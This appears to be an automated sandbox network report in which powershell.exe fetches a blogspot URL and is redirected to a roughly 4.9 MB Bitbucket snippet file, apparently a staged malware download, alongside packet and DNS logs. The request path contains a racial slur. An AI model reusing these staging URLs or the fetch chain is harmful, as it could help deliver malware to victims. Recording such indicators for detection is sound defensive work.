Jan 8, 2025 13:55:36.445868015 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.445872068 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445884943 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.446070910 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.446121931 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446137905 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446212053 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.446212053 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.446223974 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446476936 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.446496010 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446511984 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446576118 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446597099 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.446597099 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.446603060 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446619034 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.446655989 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447036982 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447046041 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.447118998 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.447137117 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.447161913 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447161913 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447168112 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.447197914 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.447215080 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.447233915 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447235107 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447241068 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.447279930 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447279930 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.447349072 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.532259941 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532283068 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532329082 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532361984 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532366991 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.532366991 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.532382011 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532404900 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.532516003 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.532641888 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532655954 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532778025 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.532785892 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532902002 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.532919884 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533005953 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.533005953 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.533013105 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533090115 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533106089 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533205032 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.533205032 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.533211946 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533379078 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533396959 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533488035 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.533488035 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.533499002 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533708096 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533723116 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533768892 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.533780098 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.533804893 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.534352064 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.534401894 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.534447908 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.534456015 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.534487009 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619021893 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619045973 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619204998 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619204998 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619216919 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619298935 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619327068 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619378090 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619383097 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619415998 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619525909 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619539976 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619580984 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619586945 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619618893 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619784117 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619803905 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619856119 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.619862080 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.619932890 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.620037079 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620059967 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620146036 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.620151997 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620193005 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.620390892 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620407104 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620486975 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.620486975 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.620492935 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620659113 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620673895 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620727062 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.620732069 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620764017 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.620959044 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.620976925 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.621040106 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.621040106 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.621046066 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.703478098 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.705923080 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.705940008 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706029892 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.706037045 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706227064 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706243992 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706343889 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.706343889 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.706351042 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706583977 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706598043 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706641912 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706659079 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706700087 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.706700087 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.706710100 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.706748009 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707151890 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707165956 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707221985 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707226992 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707237005 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707246065 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707264900 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707297087 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707300901 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707329035 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707485914 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707501888 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707568884 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707568884 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707575083 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707897902 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707912922 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.707979918 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.707986116 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.805740118 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.805762053 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.805870056 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.805881977 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.819864988 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.819889069 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.820018053 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.820029020 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.820072889 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.834099054 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.834120035 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.834218979 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.834218979 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.834227085 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.848661900 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.848707914 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.848762989 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.848771095 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.848795891 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.862561941 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.862581015 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.862680912 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.862693071 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.876754999 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.876775026 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.876826048 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.876832962 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.876894951 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.890924931 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.890945911 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.891020060 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.891027927 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.891069889 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.905164003 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.905186892 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.905251980 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.905260086 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.905312061 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.996448994 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.996489048 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.996521950 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.996530056 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.996571064 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.996592045 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.996597052 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.996608973 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.996637106 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.996674061 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.996674061 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.997479916 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.997499943 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.997554064 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.997554064 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.997560024 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.997612000 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.997628927 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.997659922 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:37.202714920 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:37.503344059 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:37.702733040 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:38.111336946 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:38.111438990 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:38.943332911 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:38.943428040 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:40.575359106 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:40.575484991 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:44.031356096 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:44.031429052 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:50.687339067 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:50.687433958 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:56:03.743339062 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:56:03.745574951 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:56:13.748867035 CET	49964	443	192.168.2.4	185.166.143.48

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 13:55:16.238965034 CET	58669	53	192.168.2.4	1.1.1.1
Jan 8, 2025 13:55:16.260699987 CET	53	58669	1.1.1.1	192.168.2.4
Jan 8, 2025 13:55:19.141664028 CET	57669	53	192.168.2.4	1.1.1.1
Jan 8, 2025 13:55:19.149260998 CET	53	57669	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 13:55:16.238965034 CET	192.168.2.4	1.1.1.1	0x5006	Standard query (0)	hot7jan.blogspot.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:55:19.141664028 CET	192.168.2.4	1.1.1.1	0x3d9	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 13:54:18.825875998 CET	1.1.1.1	192.168.2.4	0x2af	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:54:18.825875998 CET	1.1.1.1	192.168.2.4	0x2af	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:54:20.224200964 CET	1.1.1.1	192.168.2.4	0x1618	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 13:54:20.224200964 CET	1.1.1.1	192.168.2.4	0x1618	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:54:32.446290016 CET	1.1.1.1	192.168.2.4	0xc212	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 13:54:32.446290016 CET	1.1.1.1	192.168.2.4	0xc212	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:54:56.905272961 CET	1.1.1.1	192.168.2.4	0xf57c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 13:54:56.905272961 CET	1.1.1.1	192.168.2.4	0xf57c	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:55:16.260699987 CET	1.1.1.1	192.168.2.4	0x5006	No error (0)	hot7jan.blogspot.com	blogspot.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 13:55:16.260699987 CET	1.1.1.1	192.168.2.4	0x5006	No error (0)	blogspot.l.googleusercontent.com		142.250.185.225	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:55:19.149260998 CET	1.1.1.1	192.168.2.4	0x3d9	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:55:19.149260998 CET	1.1.1.1	192.168.2.4	0x3d9	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:55:19.149260998 CET	1.1.1.1	192.168.2.4	0x3d9	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

hot7jan.blogspot.com

bitbucket.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49845	142.250.185.225	443	2936	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:55:17 UTC	181	OUT	GET ///////nigger.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: hot7jan.blogspot.com Connection: Keep-Alive
2025-01-08 12:55:17 UTC	467	IN	HTTP/1.1 302 Moved Temporarily X-Robots-Tag: noindex, nofollow Content-Type: text/html; charset=UTF-8 Location: /atom.xml Date: Wed, 08 Jan 2025 12:55:17 GMT Expires: Wed, 08 Jan 2025 12:55:17 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-08 12:55:17 UTC	224	IN	Data Raw: 64 61 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 2f 61 74 6f 6d 2e 78 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: da<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Temporarily</H1>The document has moved <A HREF="/atom.xml">here</A>.</BODY></HTML>
2025-01-08 12:55:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49857	142.250.185.225	443	2936	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:55:18 UTC	149	OUT	GET /atom.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: hot7jan.blogspot.com
2025-01-08 12:55:19 UTC	661	IN	HTTP/1.1 302 Found Cross-Origin-Resource-Policy: cross-origin ETag: W/"cd616d4f42d33423013649c829d2cedd94e52524f5a4c87a10a07a567a5ed829" Date: Wed, 08 Jan 2025 12:55:19 GMT Content-Type: text/html; charset=UTF-8 Server: blogger-renderd Expires: Wed, 08 Jan 2025 12:55:20 GMT Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1 X-Content-Type-Options: nosniff X-XSS-Protection: 0 Location: https://bitbucket.org/!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt Content-Length: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49867	185.166.143.48	443	2936	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:55:20 UTC	254	OUT	GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bitbucket.org Connection: Keep-Alive
2025-01-08 12:55:20 UTC	4848	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:55:20 GMT Content-Type: text/plain Content-Length: 4951516 Server: AtlassianEdge Cache-Control: s-maxage=900, max-age=900 Etag: "b21f207101abbbb84b30dfffb68c53e5" Expires: Thu, 08 Jan 2026 12:46:05 GMT Vary: Authorization, Accept-Language, Origin, Accept-Encoding X-View-Name: bitbucket.apps.snippets.api.v20.commits.SnippetFileHandler X-Used-Mesh: False X-Dc-Location: Micros-3 X-Served-By: 734b76207109 X-Version: d08b93e25c14 X-Static-Version: d08b93e25c14 X-Request-Count: 3849 X-Render-Time: 0.2580547332763672 X-B3-Traceid: eef2dc13556f4170b7eb42de582ca886 X-B3-Spanid: b19162df1e615d31 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; object-src 'none'; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org .bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.s [TRUNCATED] X-Usage-Quota-Remaining: 992385.881 X-Usage-Request-Cost: 7686.53 X-Usage-User-Time: 0.216160 X-Usage-System-Time: 0.014436 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 X-Accepted-Oauth-Scopes: snippet Content-Language: en Age: 554 Accept-Ranges: bytes X-Cache: HIT X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 46b4f749d67747d99c0bbda2a77e5d97 Atl-Request-Id: 46b4f749-d677-47d9-9c0b-bda2a77e5d97 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": 